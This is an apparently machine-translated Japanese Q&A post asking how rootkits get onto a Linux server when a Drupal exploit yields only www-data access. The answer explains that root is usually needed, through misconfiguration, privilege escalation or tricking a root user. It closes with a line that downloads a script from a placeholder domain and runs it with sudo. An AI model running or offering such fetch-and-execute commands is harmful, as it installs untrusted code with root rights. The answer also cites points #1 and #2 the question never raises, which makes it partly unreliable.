ルートキットのチェックに関するいくつかの投稿を見てきましたが、それらがどのようにLinuxシステムに到達するかについての情報を見つけることができませんでした。特に、php Webサイトのバグを悪用した場合(ここでdrupageddonについて話しています)、rootとしてではなくWebサーバー(www-data)としてのみ実行できる場合でも、ルートキットをインストールできます。これらがどのようにインストールされるかについて私が見つけたごくわずかな情報は、それらをインストールするためにrootである必要があることを示唆しています(こちらを参照)。
回答:
それが私だったら、私は次の方法を続けます:
#1に関して:Linuxを使用しているとき、ユーザーはランダムなソフトウェアをダウンロードしてはいけません。適切なチャネル(Ubuntu Software Center)を使用してソフトウェアをインストールします。適切なチャネルの外部でダウンロードする必要があるのがソフトウェアの場合、ダウンロードのソースが信頼できることを確認してください。ApacheソフトウェアまたはMySQLの最新バージョンを考えてください。そのアプリケーションの整合性について、さまざまなソーシャルメディアをチェックせずに、ランダムなソフトウェアをダウンロードすることは避けてください。マイクロソフトはソフトウェアを一元化しません。その結果、多くの人がソフトウェアに手を出しているため、ユーザーベースは苦手ですが、コンピューターに簡単にアクセスして、販売できるデータを収集しやすくなりました。
#2に関して:致命的なユーザーの欠陥。管理者のパスワードが入力される理由が分からない限り、決して管理者パスワードを入力しないでください。
はい、一般的にルートキットをインストールするにはルート権限が必要です。ルートキットの多くにはカーネルにロードされるモジュールが含まれており、他のルートキットは通常、ルートが使用する単なる上書きツールです。適切に設定された完璧なシステムでは、ルート権限なしにルートキットをインストールする方法はありませんが、...
...システム構成に問題があり、システムが安全でなくなる可能性があります。...特権の昇格を許可するセキュリティバグがあるかもしれない... root権限を持つユーザーをだまして何かを実行させる方法があるかもしれない。
方法は、侵入者の想像力と同じくらい無制限です。
wget http://mydomain/script.sh;sudo ./script.sh